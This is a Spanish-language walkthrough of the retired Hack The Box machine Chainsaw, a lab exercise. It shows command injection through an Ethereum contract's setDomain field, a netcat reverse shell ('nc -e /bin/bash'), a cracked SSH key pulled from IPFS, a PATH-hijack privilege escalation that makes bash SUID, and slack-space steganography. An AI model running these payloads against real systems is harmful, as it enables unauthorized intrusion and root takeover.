Maquina Retirada Chainsaw de Hack The Box (Necesario VIP)
Published on 19 Dec 2021
Chainsaw ~ Hack The Box
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.142 "
Procedemos con el siguiente escaneo de Nmap
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1001 1001 23828 Dec 05 2018 WeaponizedPing.json
| -rw-r--r-- 1 1001 1001 243 Dec 12 2018 WeaponizedPing.sol
|_-rw-r--r-- 1 1001 1001 44 Dec 20 15:18 address.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:dd:8a:5d:3c:78:d4:41:ff:bb:27:39:c1:a2:4f:eb (RSA)
| 256 3d:71:ff:d7:29:d5:d4:b2:a6:4f:9d:eb:91:1b:70:9f (ECDSA)
|_ 256 7e:02:da:db:29:f9:d2:04:63:df:fc:91:fd:a2:5a:f2 (ED25519)
9810/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 400 Bad Request
| Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: *
| Content-Type: text/plain
| Date: Mon, 20 Dec 2021 15:21:11 GMT
| Connection: close
| Request
| GetRequest:
| HTTP/1.1 400 Bad Request
| Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: *
| Content-Type: text/plain
| Date: Mon, 20 Dec 2021 15:21:07 GMT
| Connection: close
| Request
| HTTPOptions:
| HTTP/1.1 200 OK
| Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: *
| Content-Type: text/plain
| Date: Mon, 20 Dec 2021 15:21:07 GMT
|_ Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9810-TCP:V=7.91%I=7%D=12/20%Time=61C09F63%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,118,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nAccess-Control-All
SF:ow-Headers:\x20Origin,\x20X-Requested-With,\x20Content-Type,\x20Accept,
SF:\x20User-Agent\r\nAccess-Control-Allow-Origin:\x20\*\r\nAccess-Control-
SF:Allow-Methods:\x20\*\r\nContent-Type:\x20text/plain\r\nDate:\x20Mon,\x2
SF:020\x20Dec\x202021\x2015:21:07\x20GMT\r\nConnection:\x20close\r\n\r\n40
SF:0\x20Bad\x20Request")%r(HTTPOptions,100,"HTTP/1\.1\x20200\x20OK\r\nAcce
SF:ss-Control-Allow-Headers:\x20Origin,\x20X-Requested-With,\x20Content-Ty
SF:pe,\x20Accept,\x20User-Agent\r\nAccess-Control-Allow-Origin:\x20\*\r\nA
SF:ccess-Control-Allow-Methods:\x20\*\r\nContent-Type:\x20text/plain\r\nDa
SF:te:\x20Mon,\x2020\x20Dec\x202021\x2015:21:07\x20GMT\r\nConnection:\x20c
SF:lose\r\n\r\n")%r(FourOhFourRequest,118,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nAccess-Control-Allow-Headers:\x20Origin,\x20X-Requested-With,\x2
SF:0Content-Type,\x20Accept,\x20User-Agent\r\nAccess-Control-Allow-Origin:
SF:\x20\*\r\nAccess-Control-Allow-Methods:\x20\*\r\nContent-Type:\x20text/
SF:plain\r\nDate:\x20Mon,\x2020\x20Dec\x202021\x2015:21:11\x20GMT\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Procedemos con el Puerto 21 - FTP - User:anonymous pass: Descargamos los recursos que encontramos a nuestra Maquina
# ls
address.txt WeaponizedPing.json WeaponizedPing.sol
Iniciamos una Consola de Python3 Jugamos con las librerias para BlockChain Web3, etherium
>>> from web3 import Web3, eth
>>> import json
>>> address = '0x6B685cC39bD295c640D347BCffFe7eAF0d52726d'
>>> w3 = Web3(Web3.HTTPProvider('http://10.10.10.142:9810'))
>>> w3.eth.accounts
['0x96dcf19159885661763A2dC660C26eD43bA219EA', '0x727e4B4A323C8e44Bb3FD6e6204C71aE5404a9Ab', '0x15277FC14C83B8EcbF116eC9567F661A9B77F6D8', '0x08F388310Bd454784Ee4fD849D53Fefbc9872aAb', '0x2266F706b10C9a048B4548399eBBA518bFb6196f', '0x44cC8A65153a071425F56066f68fc2Ec47b6C862', '0x5D139e0229902005f9b4088108Eef65a05949cb2', '0xEc3845eb26262D2F531e817c121A64A1E9F6D497', '0x276Db76243DC443D2Ae2729D14861B452ED2c79e', '0x5359AFbD63Af1daF0248602DA1aFBA39d31347f8']
>>> w3.eth.defaultAccount = w3.eth.accounts[0]
>>> json_file = json.loads(open("WeaponizedPing.json", "r").read())
>>> json_file['abi']
[{'constant': True, 'inputs': [], 'name': 'getDomain', 'outputs': [{'name': '', 'type': 'string'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'name': '_value', 'type': 'string'}], 'name': 'setDomain', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}]
>>> abi = json_file['abi']
>>> contract = w3.eth.contract(address=address, abi=abi)
>>> conttrac.functions.
conttrac.functions.abi conttrac.functions.address conttrac.functions.getDomain( conttrac.functions.setDomain( conttrac.functions.web3
>>> contract.functions.getDomain().call()
'google.com'
>>> contract.functions.setDomain('youtube.com').transact()
HexBytes('0xaf117d49938704c00dd79b9ffdcac17b077bae594ad7a83a507a1bdcbbe5b356')
>>> contract.functions.getDomain().call()
'youtube.com'
>>> contract.functions.setDomain('10.10.14.12; ping -c 3 IP').transact()
HexBytes('0xf6bfe28c9b14a523c3621e893ade5ac89c1bd171c124a03c4baba1ac9e6f79b9')
- RCE -
>>> contract.functions.setDomain('10.10.14.12;nc -e /bin/bash IP 443').transact()
HexBytes('0x732bdc75b92c0e037a61b113fbd62230ef534d93c4d00ac5a39796f1f26439dc')
Nos ponemos con una session de nc -vlnp 443 a la escucha y recibimos la shell como Administrator
IPFS - User Pivotion
Encontramos enumerando el directorio de nuestro usuario un directorio llamado .ipfs
Procedemos de la siguiente manera.
administrator@chainsaw:/home/administrator$ for i in $(ipfs refs local); do ipfs ls $i 2>/dev/null; done
QmXWS8VFBxJPsxhF8KEqN1VpZf52DPhLswcXpxEDzF5DWC 391 arti.key.pub
QmPjsarLFBcY8seiv3rpUZ2aTyauPF3Xu3kQm56iD6mdcq 391 bobby.key.pub
QmUHHbX4N8tUNyXFK9jNfgpFFddGgpn72CF1JyNnZNeVVn 391 bryan.key.pub
QmUH2FceqvTSAvn6oqm8M49TNDqowktkEx4LgpBx746HRS 391 lara.key.pub
QmcMCDdN1qDaa2vaN654nA4Jzr6Zv9yGSBjKPk26iFJJ4M 391 wendy.key.pub
QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri 45459 mail-log/
QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB 10063 artichain600-protonmail-2018-12-13T20_50_58+01_00.eml
QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF 4640 "bobby"axelrod600-protonmail-2018-12-13-T20_28_54+01_00.eml SERA LA ID_RSA ?? Para Bobby??
QmZxzK6gXioAUH9a68ojwkos8EaeANnicBJNA3TND4Sizp 10084 bryanconnerty600-protonmail-2018-12-13T20_50_36+01_00.eml
QmegE6RZe59xf1TyDdhhcNnMrsevsfuJHUynLuRc4yf6V1 10083 laraaxelrod600-protonmail-2018-12-13T20_49_35+01_00.eml
QmXwXzVYKgYZEXU1dgCKeejT87Knw9nydGcuUZrjwNb2Me 10092 wendyrhoades600-protonmail-2018-12-13T20_50_15+01_00.eml
QmZTR5bcpQD7cFgTorqxZDYaew1Wqgfbd2ud9QqGPAkK2V 1688 about
QmYCvbfNbCwFR45HiNP45rwJgvatpiW38D961L5qAhUM5Y 200 contact
QmY5heUM5qgRubMDD1og9fhCPA6QdkMp3QCwd4s7gJsyE7 322 help
QmejvEPop4D7YUadeGqYWmZxHhLc4JBUCzJJHWMzdcMe2y 12 ping
QmXgqKTbzdh83pQtKFb19SpMCpDDcKR2ujqk3pKph9aCNF 1692 quick-start
QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB 1102 readme
QmQ5vhrL7uv6tuoN9KeVBwd4PwfQkXdVVmDLUZuTNxqgvm 1173 security-notes
QmWMuEvh2tGJ1DiNPPoN6rXme2jMYUixjxsC6QUji8mop8 2996 maintain/
QmXymZCHdTHz5BA5ugv9MQTBtQAb6Vit4iFeEnuRj6Udrh 660 gen.py
QmPctBY8tq2TpPufHuQUbe2sCxoy2wD5YRB6kdce35ZwAx 2237 pub/
QmYn3NxLLYA6xU2XL1QJfCZec4B7MpFNxVVtDvqbiZCFG8 231 chainsaw-emp.csv
Nos descargamos el contenido del mail encontramos una cadena en base64 que resulta ser la id_rsa de Bobby
ipfs get QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
Decodificamos la ID_RSA en base64
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,53D881F299BA8503
SeCNYw/BsXPyQq1HRLEEKhiNIVftZagzOcc64ff1IpJo9IeG7Z/zj+v1dCIdejuk
7ktQFczTlttnrIj6mdBb6rnN6CsP0vbz9NzRByg1o6cSGdrL2EmJN/eSxD4AWLcz
n32FPY0VjlIVrh4rjhRe2wPNogAciCHmZGEB0tgv2/eyxE63VcRzrxJCYl+hvSZ6
fvsSX8A4Qr7rbf9fnz4PImIgurF3VhQmdlEmzDRT4m/pqf3TmGAk9+wriqnkODFQ
I+2I1cPb8JRhLSz3pyB3X/uGOTnYp4aEq+AQZ2vEJz3FfX9SX9k7dd6KaZtSAzqi
w981ES85Dk9NUo8uLxnZAw3sF7Pz4EuJ0Hpo1eZgYtKzvDKrrw8uo4RCadx7KHRT
inKXduHznGA1QROzZW7xE3HEL3vxR9gMV8gJRHDZDMI9xlw99QVwcxPcFa31AzV2
yp3q7yl954SCMOti4RC3Z4yUTjDkHdHQoEcGieFOWU+i1oij4crx1LbO2Lt8nHK6
G1Ccq7iOon4RsTRlVrv8liIGrxnhOY295e9drl7BXPpJrbwso8xxHlT3333YU9dj
hQLNp5+2H4+i6mmU3t2ogToP4skVcoqDlCC+j6hDOl4bpD9t6TIJurWxmpGgNxes
q8NsAentbsD+xl4W6q5muLJQmj/xQrrHacEZDGI8kWvZE1iFmVkD/xBRnwoGZ5ht
DyilLPpl9R+Dh7by3lPm8kf8tQnHsqpRHceyBFFpnq0AUdEKkm1LRMLAPYILblKG
jwrCqRvBKRMIl6tJiD87NM6JBoQydOEcpn+6DU+2Actejbur0aM74IyeenrGKSSZ
IZMsd2kTSGUxy9o/xPKDkUw/SFUySmmwiqiFL6PaDgxWQwHxtxvmHMhL6citNdIw
TcOTSJczmR2pJxkohLrH7YrS2alKsM0FpFwmdz1/XDSF2D7ibf/W1mAxL5UmEqO0
hUIuW1dRFwHjNvaoSk+frAp6ic6IPYSmdo8GYYy8pXvcqwfRpxYlACZu4Fii6hYi
4WphT3ZFYDrw7StgK04kbD7QkPeNq9Ev1In2nVdzFHPIh6z+fmpbgfWgelLHc2et
SJY4+5CEbkAcYEUnPWY9SPOJ7qeU7+b/eqzhKbkpnblmiK1f3reOM2YUKy8aaleh
nJYmkmr3t3qGRzhAETckc8HLE11dGE+l4ba6WBNu15GoEWAszztMuIV1emnt97oM
ImnfontOYdwB6/2oCuyJTif8Vw/WtWqZNbpey9704a9map/+bDqeQQ41+B8ACDbK
WovsgyWi/UpiMT6m6rX+FP5D5E8zrYtnnmqIo7vxHqtBWUxjahCdnBrkYFzl6KWR
gFzx3eTatlZWyr4ksvFmtobYkZVAQPABWz+gHpuKlrqhC9ANzr/Jn+5ZfG02moF/
edL1bp9HPRI47DyvLwzT1/5L9Zz6Y+1MzendTi3KrzQ/Ycfr5YARvYyMLbLjMEtP
UvJiY40u2nmVb6Qqpiy2zr/aMlhpupZPk/xt8oKhKC+l9mgOTsAXYjCbTmLXzVrX
15U210BdxEFUDcixNiwTpoBS6MfxCOZwN/1Zv0mE8ECI+44LcqVt3w==
-----END RSA PRIVATE KEY-----
Parece encriptada, procedemos con ssh2john a obtener un hash y crackearlo
jackychain
Nos conectamos con la id_rsa como Bobby por SSH.
bobby@chainsaw:/opt$ find / -perm -4000 2>/dev/null
/home/bobby/projects/ChainsawClub/ChainsawClub
Procedemos a hacer el comando strings al binario SUID ChainsawClub encontramos que se esta llamando de forma relativa al comando sudo
Podemos efectuar PATH HIJACKING
cd /tmp
nano "sudo" -->
------------------
#!/bin/bash
"chmod u+s /bin/bash"
-------------------
Procedemos a darle permisos de ejecucion
chmod "+x sudo"
Cambiamos el PATH para que pille nuestro archivo hijaker en bash llamado SUDO almacenado en la ruta /tmp
bobby@chainsaw:/tmp$export PATH="/tmp":$PATH
Nos movemos al Binario SUID y lo ejecutamos
bobby@chainsaw:/tmp$ cd /home/bobby/projects/ChainsawClub/
bobby@chainsaw:~/projects/ChainsawClub$" ./ChainsawClub "
Comprobando si la Bash es SUID
bobby@chainsaw:~/projects/ChainsawClub$ ls -l /bin/bash
-rw"s"r-xr-x 1 root root 1121696 Sep 12 2018 /bin/bash
Nos Migramos la consola al usuario ROOT con un bash -p
bobby@chainsaw:~/projects/ChainsawClub$ bash -p
bash-4.4# cd /root
bash-4.4# ls
ChainsawClub root.txt snap
Sacamos la Flag para Root
bash-4.4# cat root.txt
Mine deeper to get rewarded with root coin (RTC)...
Steganografia - Bmap - Guardando Datos en el Slack SPace de archivos
Consiste en almacenar los datos en la porcion de espacio vacio, o reservado que se alberga para los archivos
bash-4.4# "bmap --mode slack" root.txt
getting from block 2655304
file size was: 52
"slack" size: 4044
block size: 4096
xxxxxxxxxx7deca1b9dd386cd4c395b06e3
Normalmente cuando escribimos en archivos, los datos se almacenan en la porcion llamada block size y a medida que almacenamos data se van consimiendo los recursos del slack space para ir sumandose al block space. Por eso con esta tecnica se consigue almacenar datos en archivos y que tengan otra posible data escondida y no varie el peso del archivo en la block space.
Box Guapisima Hacked - K0H4ck